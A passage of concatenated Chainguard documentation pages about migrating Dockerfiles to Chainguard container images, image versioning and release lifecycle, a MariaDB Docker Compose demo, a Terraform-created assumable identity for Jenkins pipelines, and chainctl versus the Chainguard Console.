can then test the image to make sure it works with your application before merging the PR. So for my example, it would check the Chainguard registry for the current digest of the latest tag and open a PR if it doesn’t match the digest in the file. We use Digestabot internally at Chainguard, and this pattern nicely balances the tension between keeping images up to date and vulnerability-free with the need to test and verify changes before shipping to production. So please try it out and let me know if you have any questions. Relevant Resources Reproducible Dockerfiles with Frizbee and Digestabot (Video) Reproducibility and Chainguard Containers (Video) Considerations for Keeping Containers Up to Date (Article) Strategies and Tooling for Updating Container Containers (Article) --- ### Migrating a Dockerfile for a Go application to use Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating_go/ Last Modified: December 12, 2024 Tools used in this video Docker Transcript In this video, I’m going to show how easy it is to port an existing Dockerfile to use a Chainguard Containers base, and how that can help to improve the image, especially in terms of security. I’ll be using the free tier of Chainguard Containers here, so you can do everything in this video on your own projects today. The example I’m going to use is porting an existing Golang project to use the Chainguard Go and Static images, but a very similar technique can be used for other compiled languages, such as Rust and C, especially where you can produce a statically linked executable. Okay, so over to the terminal. Okay, so I have this simple Go project. We can take a look at the main part of the code. It’s extremely simple. All we’re doing is creating a web server that listens on port 8080 and responds with the text: “Hello world.” We also have a Dockerfile to build our application. It’s extremely simple as well. We’re using the Dockerhub Golang image, copying over the source, and running Go build. So let’s try building that. I’ve built it before, so that ran really fast. We can try running it. I should be able to access it. Okay, so that all works. It’s a really nice, simple Go web server. Let’s take a look at how we can change it to use a Chainguard Container. The easiest thing we can do, literally a one-line change, is just to modify this to point out the Chainguard Go image. With any luck, that will build just the same. So I’ll go back to this original build statement. We’ll call it something different so we can compare it later. Okay, that’s built. Now we want to check it runs. I do need to first stop the old one. Okay, let’s try running it again. It’s running. Let’s check it works. Okay, so that works identically. A one-line change, and we’ve made no difference to the actual running application. But let’s investigate this a little bit more. So if I do docker images on go-web-app, well this is a pretty large image at 892 megabytes. If I run it on our new image, it’s 775 megabytes. So that’s 120 megabytes saving, but still quite a large image. More interestingly, if I try Docker Scout Quick View to take a look at the CVEs, if I run it on Go web app, we can see there’s 42 lower vulnerabilities in there. So there’s quite a bit going on in there. We can also see there’s 303 packages. So there’s a lot of stuff in this image. Let’s compare it to the Chainguard Container. There’s no CVEs and there’s only 85 packages. So this one change has really improved the security posture by getting rid of these 42 low CVEs. But there’s a lot more we can do. Let’s take a look at the Dockerfile again. So we’re using this Chainguard Go image, but we don’t need everything in this image when we’re actually running the image. We just need the Go compiler, for instance, to build the server, but we don’t need the Go compiler in the final image. So what we can do is create a multi-stage build. And I’m going to use the Chainguard static image to house the final production application. So the static image is really simple. It has very little in it, just sort of the minimum you need to run a typical Linux application. So it has TLS certificates so you can talk to web applications over TLS. It has Unix directories like /tmp and /home, and it doesn’t have a lot else. It’s only a few megabytes in size, but contains a few more things than say scratch that you need for typical applications. OK, what we’re going to do here is I’m going to copy from the previous build to the Dockerfile up here. I’m going to copy the hello executable, which is at /work/hello to /hello. Now it said copy from builder, so I’ll need to name this first step builder. And that will build this hello executable and copy it into my production image. And then my entry point is now /hello. So there is one more thing we need to do. The static image does not include any libraries like Glibc or anything. It just has enough for running statically compiled binaries. So we need to tell Go to produce a statically compiled binary that contains everything it needs to run and doesn’t rely on system libraries. And we can do that by saying cgo enabled equals zero. In some cases, you might find you need to pass a few more flags, depending on which Go libraries you use. And I’ll link a blog in the notes that explains when you need to do this and what you need to do. But in this case, CGO_enabled=0 will allow us to build our static binary. So I think that’s all I need to do. We’ll see if I got it right. Let’s find the Docker build step. I’m going to call this distroless. So when you create an image with just the bare minimum in it to run your application, we quite often call it a distroless image. No, it doesn’t even have a shell or a package manager. OK, let’s see. Let’s see if that builds. Yep, that built. Excellent. I think I still have the old one running. So let’s get rid of the old web app. No, I always get that wrong. OK, and let’s run this one. I call it web-app-distroless. I hope so. That’s running. Let’s see if it works. Excellent. So this application still works exactly the same as it did at the start of this video. But if I take a look at the web app distroless, the big difference is that now it’s only 8.5 megabytes in size. So we went from the original Golang image, which is 892 megabytes, to a Chainguard Container, which was 775 megabytes, down to 8.51 megabytes. And it still all works the same. So that’s a big saving in terms of space. It also means it’s a lot quicker to transfer about. It’s a lot quicker to start up on your nodes, etc. And most importantly, it should still have zero CVEs. Yes. If you don’t have access to Docker Scout quick view, you can use other scanners, of course. There’s things like Snyk and Grype. It’s a great free one that we use quite a lot in Chainguard. But that’s really all I want to talk about. So please do go and try out our static images. They do work great with go, but also they work with Rust, C, etc. And we also have a variance that include things like the Glibc libraries. If you just need a very minimal image with Glibc and nothing else to run your application. OK, please try it out and let me know how you get on. Relevant Resources Using the static Chainguard Container (Video) Choosing an Container for your Compiled Programs (Article) Getting Started with the Go Chainguard Container (Article) --- ### Chainguard Containers Product Release Lifecycle URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/versions/ Last Modified: December 17, 2024 Tags: Chainguard Containers, Product Chainguard Containers are able to offer few-to-zero known vulnerabilities because they are updated frequently. Because of this continuous release cycle, the best way to mitigate vulnerabilities is to use the newest build of each Chainguard Container available. Chainguard keeps Containers up to date by doing one or more of the following: Applying new releases from upstream projects Rapidly applying upstream patches to current releases — you can read more about this in our blog post, “How Chainguard fixes vulnerabilities before they’re detected” Applying Chainguard patches to OSS software Upstream projects are updated frequently for many reasons, including to combat CVEs, and Chainguard ensures that the most up-to-date software is available in all Chainguard Containers. Additionally, Chainguard often identifies CVEs and other issues before scanners can detect them, so Chainguard may offer a patch to a vulnerable dependency to support Chainguard Containers with few-to-zero vulnerabilities. The best way to mitigate vulnerabilities is to continually update to the latest patched releases of software, but testing and updating can take time and effort. To support flexibility and user choice, Chainguard aims to offer multiple versions of a Chainguard Container that provide the lowest number of vulnerabilities realistically possible. This document provides an overview of Chainguard’s approach to updates, releases, and versions within Chainguard Containers. For more specific guidance, please contact us. Open Source Release Tracks In order to understand how Chainguard releases Chainguard Containers, it’s first important to understand how different open source projects version and release software. This is because Chainguard Containers are built on open source software. There are generally two open source approaches: multiple releases across different versions, or a single release track. In rare cases, open source projects don’t follow a release pattern at all. Multiple Releases Maintained by a Given Open Source Project Popular open source projects often provide maintenance for a number of release tracks concurrently. For example, Java, Go, Postgres, and Kubernetes patch multiple release versions, each on their own defined maintenance schedule. For these types of projects, Chainguard will maintain every version track of the upstream software that receives updates from the project. Single Release Track Maintained by a Given Open Source Project Many open source projects support only a single stream of releases that are continuously incremented; often, this is simply the latest release. In the case of a single release track, any security fix that is published will only be applied to the most recent release of the project, and the project release tags will be updated to indicate a new version is available. For this type of project, Chainguard only warrants that the latest release of the software and its corresponding version tags have the most up-to-date patches available. What Chainguard Supports and Maintains for Chainguard Containers There are several scenarios that define what Chainguard agrees to maintain regarding software versions in the Chainguard Containers Directory. All container images that Chainguard currently supports are those with upstream software that is still supported and maintained, and Chainguard patches and rebuilds these Containers daily. If you have purchased a container image during its lifecycle that is no longer being supported upstream, you will still be able to access this Container, but Chainguard will not be patching or rebuilding this Container and it will start to accrue CVEs. It is recommended to upgrade to an actively maintained version. The table provides some example scenarios to help illustrate our approach. Category Example Maintained Upstream Releases Chainguard Patches Chainguard No Longer Patches Multiple Release Tracks Go 1.23, 1.22 :latest, 1, 1.23, 1.22 1.23.old, 1.22.old, 1.21 and below Python 3.13, 3.12, 3.11, 3.10, 3.9 :latest, 3, 3.9 and above 3.8 and below, 3.8.old, 3.9.old, 3.10.old, 3.11.old, 3.12.old Postgres 17, 16, 15, 14, 13 :latest, 17, 16, 15, 14, 13 12 (EOL November 21, 2024) and below Single Release Track Cosign 2 :latest, 2, 2.4 2.3, 2.2, 2.1, 2.0, 1.x, 0.x Bank-Vaults 1 :latest, 1 Any previous version tag No Release Track envoyproxy/ratelimit No versioned releases :latest Any previous version tag Note: The “Maintained Upstream Releases” column is current as of December 2024. What Chainguard Container Versions to Expect When you use freely-available Chainguard Starter Containers, you will have access to the :latest version of any Container available to the public. In some cases, you will also have access to the :latest-dev version, which includes a shell and package manager. For example, the Python container image has both cgr.dev/chainguard/python:latest and cgr.dev/chainguard/python:latest-dev. Many of the programming languages have these options available, including the Java JDK and JRE containers, PHP, Go, Node, Ruby, and Rust. If you are using our enterprise Chainguard Production Containers, you will have access to more versions. The Chainguard approach is as follows: For multiple-release track projects, you will have access to major and minor versions that are actively maintained. For single-release track projects, you will receive the :latest tag as well as every versioned tag that is released over time. Chainguard Patches and Maintenance For multiple release software projects with release schedules clearly published, Chainguard will maintain every currently supported version of the software that is maintained by the upstream project. In other words, Chainguard will apply every patch that is available to every maintained version of the upstream software. For single release track software projects, Chainguard will maintain only the :latest version of the software by applying patches and incrementing the version tag when a new patch is released. Actively maintained Chainguard Containers are rebuilt on a daily cadence, so you can be sure the container image you are using is up to date. A note about -r tags In some cases, Chainguard will fix vulnerabilities in tools without waiting for the external project to release patches. As an example, say there’s a CVE in Go 1.21.3 and the Go team is uncharacteristically slow releasing a fix. In this case, Chainguard could patch a fix into 1.21.3, and release it as 1.21.3-r2. Chainguard would continue to make the original package available in an image tagged as 1.21.3-r1. If Chainguard had to apply further patches to Go 1.21.3, it would tag these later patched container images with -r3, -r4, and so on. We call this the epoch number. We may take steps like this in order to patch vulnerabilities, remove unnecessary bloat, rebuild the same source with newer tools, or to address bugs in our build configs and build tooling. Bear in mind that Chainguard’s Containers, although minimal, will almost always contain more than one package. At the time of writing this, the Go image has more than 60 distinct packages in it, such as bash, busybox, git, glibc, make, and zlib. When we fix a vulnerability in bash for example, we likewise ensure that fix gets rolled out to every container image that includes bash, including the go:1.21.3 image. The image tagged 1.21.3-r2 will pull in that bash fix, and fixes for any of the other packages in the image.‍ Put simply, when you opt in to pulling go:1.21.3-r2, you’re opting in to a consistent version of Go, and potentially floating versions of all the other packages. This means you get CVE fixes as well as patch, and minor, and even major version releases of bash, and every other package the image contains. You can learn more about our approach by reviewing our blog on image tagging philosophy. Wolfi Packages in Chainguard Containers Chainguard Containers only contain packages that are either built and maintained internally by Chainguard or packages from the Wolfi Project. These packages follow the same conventions of minimalism and rapid updates as Chainguard Containers. Starting in March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These will track the latest version of the upstream software in the package. Chainguard will end patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. The tools we use to build packages and container images remain freely available and open source in Wolfi. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our Containers customers. Note that specific package versions can be made available in Production Containers. If you have a request for a specific package version, please contact support. SLAs A vulnerability and patch service-level agreement (SLA) is available for Chainguard Production Containers. There are no SLAs available for Chainguard’s free tier of container images, but you will have access to frequently updated and patched container images with low-to-zero CVEs. If you are a Chainguard Production Containers user, Chainguard vulnerability and patch SLAs apply only to supported and maintained versions of upstream projects as clearly published by the upstream projects or published container images that can be rebuilt using updated compilers and/or libraries. In the case of single-release track projects, this means that the Chainguard vulnerability and patch SLAs apply only to the latest version and corresponding version tags of the upstream projects. Containers that use open source applications that have reached their end of life are no longer patched. End of Life and End of Support Software When an open source application version is no longer maintained by the upstream project or has otherwise met its end of life (EOL), Chainguard will generally no longer provide patches to that software. While the Chainguard Production Containers organization directory will continue to have previously purchased container images available, new builds will no longer be published and vulnerabilities are expected to accumulate in those Containers over time. It is recommended to move to an up-to-date, actively maintained version. For software applications that maintain multiple concurrent release tracks, Chainguard will endeavor to provide reasonable notice when a particular software release version is expected to reach EOL status, thus no longer updated. No EOL notice will be provided for single-release applications where the only supported release is the :latest or corresponding version tag. EOL Grace Period There are cases where an organization may want to continue using a container image after it has reached end-of-life. This could be because an image reaches EOL before the organization’s release schedule, or perhaps later image versions have one or more issues that prevent the organization from upgrading. To help in situations like this, Chainguard offers an end-of-life grace period for eligible Containers, allowing customers access to new builds of container images whose primary package has entered its end-of-life phase for up to six months after they have reached EOL. Refer to our overview of the EOL Grace Period for more information. --- ### Getting Started with the MariaDB Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/mariadb/ Last Modified: September 22, 2023 Tags: Chainguard Containers, Product The MariaDB Container based on Wolfi and maintained by Chainguard provide a distroless container image that is suitable for building and running MariaDB workloads. Because Chainguard Containers (including the MariaDB container image) are rebuilt daily with the latest sources and include the absolute minimum of dependencies, they have significantly less vulnerabilities than equivalent container images, typically zero. This means you can use the Chainguard MariaDB Container to run MariaDB databases in containerized environments with a smaller footprint and greater security. In order to illustrate how the MariaDB Chainguard Container might be used in practice, this tutorial involves setting up an example PHP application that uses a MariaDB database. This guide assumes you have Docker installed to run the demo; specifically, the procedure outlined in this guide uses Docker Compose to manage the environment on your local machine. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Step 1: Setting up a demo application This step involves downloading the demo application code to your local machine. To ensure that the application files don’t remain on your system navigate to a temporary directory like /tmp/. cd /tmp/ Your system will automatically delete the /tmp/ directory’s contents the next time it shuts down or reboots. The code that comprises this demo application is hosted in a public GitHub repository managed by Chainguard. Pull down the example application files from GitHub with the following command. git clone --sparse https://github.com/chainguard-dev/edu-images-demos.git Because this guide’s demo application code is stored in a repository with other examples, we don’t need to pull down every file from this repository. For this reason, this command includes the --sparse option. This will initialize a sparse-checkout file, causing the working directory to contain only the files in the root of the repository until the sparse-checkout configuration is modified. Navigate into this new directory and list its contents to confirm this. cd edu-images-demos/ && ls For now, this directory will only contain the repository’s LICENSE and README files. LICENSE README.md To retrieve the files you need for this tutorial’s sample application, run the following git command. git sparse-checkout set mariadb This modifies the sparse-checkout configuration initialized in the previous git clone command so that the checkout only consists of the repo’s mariadb directory. Navigate into this new directory. cd mariadb/ From here, you can run the application and use a web browser to observe it working in real time, which we’ll do in the next section. Step 2: Inspect, run, and test the sample application We encourage you to check out the application code on GitHub to better understand how this application works, but we’ll provide a brief overview here. This demo creates a LEMP (Linux, (E)NGINX, MariaDB and PHP-FPM) environment based on Wolfi Chainguard Containers. We will use Docker Compose to bring up the environment, which will spin up three containers: an app container, a mariadb container, and an nginx container. These will run as services. Once the environment is up, you can visit the demo in your web browser. The index.php file contains code that does the following: Connects to the MariaDB server running in the mariadb container Creates a new table named data if it doesn’t already exist Inserts a new entry into the table with a random number Queries the table to show all the entries Every time you reload the page, a new entry will be added to the table. Execute the following command to create and start each of the three containers and bring up the application. docker compose up -d The -d option is short for --detach; this will cause the containers to run in the background, allowing you to continue using the same terminal window. If you run into permissions issues when running this command, try running it again with sudo privileges. Note: If at any point you’d like to stop and remove these containers, run docker compose down. Once all the containers have started, you’ll be able to visit the application and observe it working. Open up your preferred web browser and navigate to localhost:8000. There, you’ll be presented with text like the following. Every time you refresh your browser, a new entry will appear. This shows that the application is recording each visit in the MariaDB database and that the application is working correctly. After confirming that the application is functioning as expected, you can read through the next section to explore how else you can work with the mariadb container. Step 3: Working with the database The docker-compose.yml file contains some configuration details regarding the MariaDB database used in this example application. Run the following command to inspect the contents of this file. cat docker-compose.yml We’re interested in the mariadb service: . . . mariadb: image: cgr.dev/chainguard/mariadb restart: unless-stopped environment: MARIADB_ALLOW_EMPTY_ROOT_PASSWORD: 1 MARIADB_USER: php MARIADB_PASSWORD: password MARIADB_DATABASE: php-test ports: - 3306:3306 volumes: - ./:/app networks: - wolfi . . . This section defines a few environment variables relating to the database used in the example application. Importantly, they specify that the application database runs under a user named php with the password “password”. Using this information, you can connect to the php database running in the container with a command like the following. docker exec -it mariadb-mariadb-1 mariadb --user php -p docker exec allows you to execute commands within a running container. The -i argument allows you to execute an interactive command while the -t option allocates a pseudo-TTY to the process within the container. Because our goal is to access the sample database through the mariadb command line client, these options are necessary. Next, enter the name of the container running the MariaDB database; by default, this will be named mariadb-mariadb-1. Following that, the remainder of this command represents the command that will be run within the container. Here, we run the mariadb command to access the database specifying that we want to connect as the php user. The final -p option indicates that we want to be prompted to enter the password. Enter password: Enter password and you’ll then be presented with the MariaDB command line SQL shell. Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 3 Server version: 10.11.4-MariaDB MariaDB Server Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> From here, you can interact with the database from within the mariadb-mariadb-1 container as you would with any other MariaDB database. For example, you could update existing tables, create new ones, and insert or delete data. To close the MariaDB prompt, you can enter the following command. \q Of course, you likely won’t be regularly managing your containerized databases over the command line. The purpose of this section is to only show that you can interact with the database running in this container just like you would with any other MariaDB database. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose MariaDB Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Create an Assumable Identity for a Jenkins Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/jenkins-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then how to update a Jenkins pipeline so that it can assume the identity and interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Jenkins server with the OpenID Connect Provider plugin installed and configured, as well as a pipeline you can use to test out the identity you’ll create. Creating Terraform Files We will be using Terraform to create an identity for a Jenkins pipeline to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/jenkins-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. To create the main.tf file, run the following command. cat > main.tf <<EOF terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } EOF Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This will contain the identity — which will be created by the jenkins.tf file — to access when we test it out later on. Now you can move on to creating the last of our Terraform configuration files, jenkins.tf. jenkins.tf The jenkins.tf file is what will actually create the identity for your Jenkins workflow to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "jenkins" { parent_id = data.chainguard_group.group.id name = "jenkins" description = <<EOF This is an identity that authorizes Jenkins workflows for this repository to assume to interact with chainctl. EOF claim_match { audience = "%your-audience%" issuer = "https://%your-domain%/oidc" subject = "%your-subject%" } } First, this section creates a Chainguard Identity tied to the Chainguard organization looked up in the sample.tf file. The identity is named jenkins and has a brief description. The most important part of this section is the claim_match. When the Jenkins workflow tries to assume this identity later on, it must present a token matching the audience, issuer and subject specified here in order to do so. The audience is the intended recipient of the issued token, while the issuer is the entity that creates the token. Finally, the subject is the entity (here, the Jenkins pipeline build) that the token represents. The audience and issuer fields use settings from your configured Jenkins OIDC credential. You can find these by clicking Manage Jenkins in the left-hand sidebar menu of your dashboard, then click Credentials. Click on your System credentials, then click Global credentials (unrestricted). This will take you to a table listing all your configured OIDC tokens. Click the wrench icon for the token you want to use to test this identity. This will take you to a screen similar to the following screenshot showing the audience and issue values you should use in your jenkins.tf file. For the subject, refer to your Jenkins repository OIDC settings page. You can find these by naivgating back to the Manage Jenkins landing page in your dashboard and clicking on Security. From there, scroll to the OpenID Connect section on the page, click on the Claim templates button, and locate the sub field. The subject value you should use will be the value in the Value format field under the first sub template. In the following example, the value to use is jenkins-oidc-test. For the purposes of this guide, you will need to replace %your-audience%, %your-domain%, and %your-subject% with the values from your Jenkins OIDC credential page, and the OpenID Connect administrative settings page. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "jenkins-identity" { value = chainguard_identity.jenkins.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.jenkins.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + jenkins-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete and will output an jenkins-identity value. . . . Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: jenkins-identity = "<your jenkins identity>" This is the identity’s UIDP (unique identity path), which you configured the jenkins.tf file to emit in the previous section. Note this value down, as you’ll need it when you test this identity using a Jenkins workflow. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. You’re now ready to create or edit a Jenkins pipeline to test out this identity. Testing the identity with a Jenkins pipeline To test the identity you created with Terraform in the previous section, create or edit a pipeline job. To create a pipeline job, click the New Item link in the menu at the top left of your Jenkins dashboard. Give the job a title, and select Pipeline from the list of job types. Once you are on the pipeline configuration page, click the This project is parameterized check box. Give your parameter a name like oidc-token and under the Credential type selection list, OpenID Connect id token. Mark the parameter as required, and select your configured OIDC credential token as the Default Value for the parameter per the following screenshot: Next copy the following pipeline definition into the Script body for your job: pipeline { agent any stages { stage('oidc-test') { steps { withCredentials([string(variable: 'token', credentialsId: 'oidc-token')]) { sh ''' wget -O chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_linux_\$(uname -m)" chmod +x chainctl ./chainctl auth login --identity-token $token --identity <your jenkins identity> ./chainctl auth configure-docker --identity-token $token --identity <your jenkins identity> ''' } } } } } The important line is withCredentials option, which maps the generated OIDC token from the oidc-token credential parameter to token variable in the pipeline step. Now you can add the commands for testing the identity using chainctl images repos list in the following example: sh ''' wget -O chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_linux_\$(uname -m)" chmod +x chainctl ./chainctl auth login --identity-token $token --identity <your jenkins identity> ./chainctl auth configure-docker --identity-token $token --identity <your jenkins identity> ./chainctl images repos list docker pull cgr.dev/<organization>/<repo>:<tag> ''' Save the job, and then build it using the Build with Parameters option. Assuming everything works as expected, your pipeline will be able to assume the identity and run the chainctl images repos list command, listing repositories available to the organization. . . . chainctl 100%[===================>] 54.34M 6.78MB/s in 13s 2023-05-17 13:19:45 (4.28 MB/s) - ‘chainctl’ saved [56983552/56983552] Successfully exchanged token. Valid! Id: 3f4ad8a9d5e63be71d631a359ba0a91dcade94ab/d3ed9c70b538a796 <list of repos> If you’d like to experiment further with this identity and what the pipeline can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_role" "editor" { name = "editor" } You can also edit the pipeline itself to change its behavior. For example, instead of inspecting the policies the identity has access to, you could have the workflow inspect the organizations. . . . - './chainctl iam organizations ls' Of course, the Jenkins pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding, and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/jenkins-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using OIDC with Jenkins pipelines, we encourage you to check out the OpenID Connect Provider documentation. --- ### Compare chainctl usage with the Chainguard Console URL: https://edu.chainguard.dev/chainguard/chainctl-usage/comparing-chainctl-to-console/ Last Modified: January 1, 0001 Tags: Chainguard Control, chainctl, Chainguard Console, Product When should I use the Chainguard Console? When is it better to use chainctl? This page gives some guidance on the benefits of each method for managing your Chainguard Containers to help you make that decision. Prerequisites To access the Chainguard Console you need to create an account and sign in. The Console is accessible to everyone, including users who aren’t Chainguard customers. To use chainctl, start by installing chainctl. See Get Started with chainctl to help you begin using it; the examples on this page assume you have chainctl installed and are authenticated. High-level Comparison The Console is especially useful for one-off information searches, such as when you don’t know precisely what you want to know. The Console provides detailed information, but may require a few clicks to hone in on precisely what you are looking for. You can perform useful container-related query tasks from within the Console, as this page will demonstrate with some examples. If you know specifically what you are looking for or what you want to accomplish, chainctl is a powerful way to do so. It can perform some additional tasks that are not yet available in the Console, such as comparing images with a diff. This guide will take the reader through a few use cases to illustrate. Find Available Images Find Available Images in the Console To find the images available to you in the Console, do this: Open the Console On the Overview page that opens, click Organization Images in the sidebar. Find Available Images with chainctl To find the images available to you using chainctl, use this command. The list of available images is likely to be long and will scroll past you quickly in the terminal, so it may be more useful to you by piping the output into a grep search or redirecting the output into a file. chainctl images list Invite Users Invite Users in the Console To invite a user using the Console, follow these steps: Open the Console. On the Overview page that opens, click the Manage pull tokens tab, just below the search box. On the Settings page that opens, click Users in the sidebar. Click Invite users. Enter the Email address of the user you are inviting and use the dropdown menu to assign a Role for this user. Click Invite. Invite Users using chainctl To invite a user using chainctl, use this command, substituting your organization name for ORGANIZATION along with setting the role, email address, length of time for the invite to be valid, and whether this invite may only be used once: chainctl iam invite create ORGANIZATION --role=viewer --email=sample@organization.dev --ttl=7d --single-use Review Container Image History Review Container Image History in the Console To examine the history of an image using the Console: Open the Console and find the image you want to examine more closely. Do this by clicking on an image in the Recent Changes list on this page or clicking View all organization images to see the full list and find the image you want. On the image page you start on the Tags tab and see a list of tags which correspond to the release version of the image, like this one for kubectl. This list contains columns with data about each image release, like the Pull URL, Digest, and when it was last changed. Click the other tabs to learn more about the latest release version of this image. Review Container Image History using chainctl To examine the history of an image using chainctl, enter this, replacing ORGANIZATION with your organization: chainctl image history kubectl:latest --parent=ORGANIZATION This will return a reverse-chronological history of when a specific tag was update to point to a new manifest digest. This list can be long. Here’s an excerpt: - time: 2025-05-29 03:08:31 UTC digest: sha256:34798f562dffc3746cb69bab49b93ff83aa57bea393a07997e87c37bc83a62db architectures: amd64: sha256:a71ccfdc86cd73d395d3528ce3f8df1f4dd132b73ff03016b0ec42da23d4ec99 (18.13 MB) arm64: sha256:2876b0c3de431f0d7df8f888a0d40bb0c8259c47109f978237d305e7818b704b (16.43 MB) - time: 2025-05-28 17:19:58 UTC digest: sha256:1f798940981573c34e1d11c8b6d266f18d06e95b81251d6880f511d55b833cfd - time: 2025-05-27 19:53:02 UTC digest: sha256:81095db3adc00495fceb064e86dfd81c7ffdf081c55daf6b12be6ef1605bd18c architectures: amd64: sha256:56db73a4b66ad326a7858ca4157ded2d3b6d11ff1030cfbdf3a3bd879a5a5725 (18.13 MB) arm64: sha256:280160c9c422d7526169812cf89401043096f5d4ff385d1b59f3610109486aed (16.43 MB) - time: 2025-05-23 01:09:22 UTC digest: sha256:c0934fc335d8b24923487cb7d0b673490bd393fd4b6cd20f6f0e156a7481ffc7 architectures: amd64: sha256:46e11b8beed94d93272e5a87753f9f43f02f5f1b9d83d8ba279eeb18c114c863 (18.13 MB) arm64: sha256:b288bc13da78aa7b2a82d50dbca45ed2fe286f0f1f248fa2e12604ef9a109f33 (16.40 MB) ... The details that are returned here and the details found in the Console vary in focus, but where the same details are provided they should match. See Examine the History of Container Images for more information about this command. Learn more To learn more about chainctl, see: chainctl Usage chainctl Reference To learn more about the Chainguard Console, see: Using the Chainguard Directory and Console. Compare a Chainguard Container to a non-Chainguard Alternative in the Console This is a feature unique to the Console and is described in detail in Using CVE Visualizations. Compare Two Chainguard Containers With chainctl This is a feature unique to chainctl and is described in detail in How To Compare Chainguard Containers with chainctl. --- ### Understanding Chainguard's Container Image Categories URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-categories/ Last Modified: April 3, 2025 Tags: Chainguard Containers, Product Chainguard Containers are a collection of curated, distroless container images designed with a focus on software supply chain security. Chainguard’s container images are designed to be slim runtimes for production environments, emphasizing security and efficiency by removing unnecessary elements. Additionally, the images are designed to be easily integrated into existing workflows, helping organizations to build better, more secure software. Within the Chainguard Containers Directory, Chainguard Containers are organized into five general categories (with some falling into multiple categories): Starter Base Application FIPS AI This conceptual article will outline each of these categories in turn, including their uses as well as examples of images from each category. It will also highlight important considerations one should make when using images from these categories. Starter Containers Chainguard offers a set of container images that are publicly available and don’t require authentication for download and use; they are free to use for everyone. We refer to these as our Starter Containers, and they cover several use cases for different language ecosystems. Starter Containers are limited to the 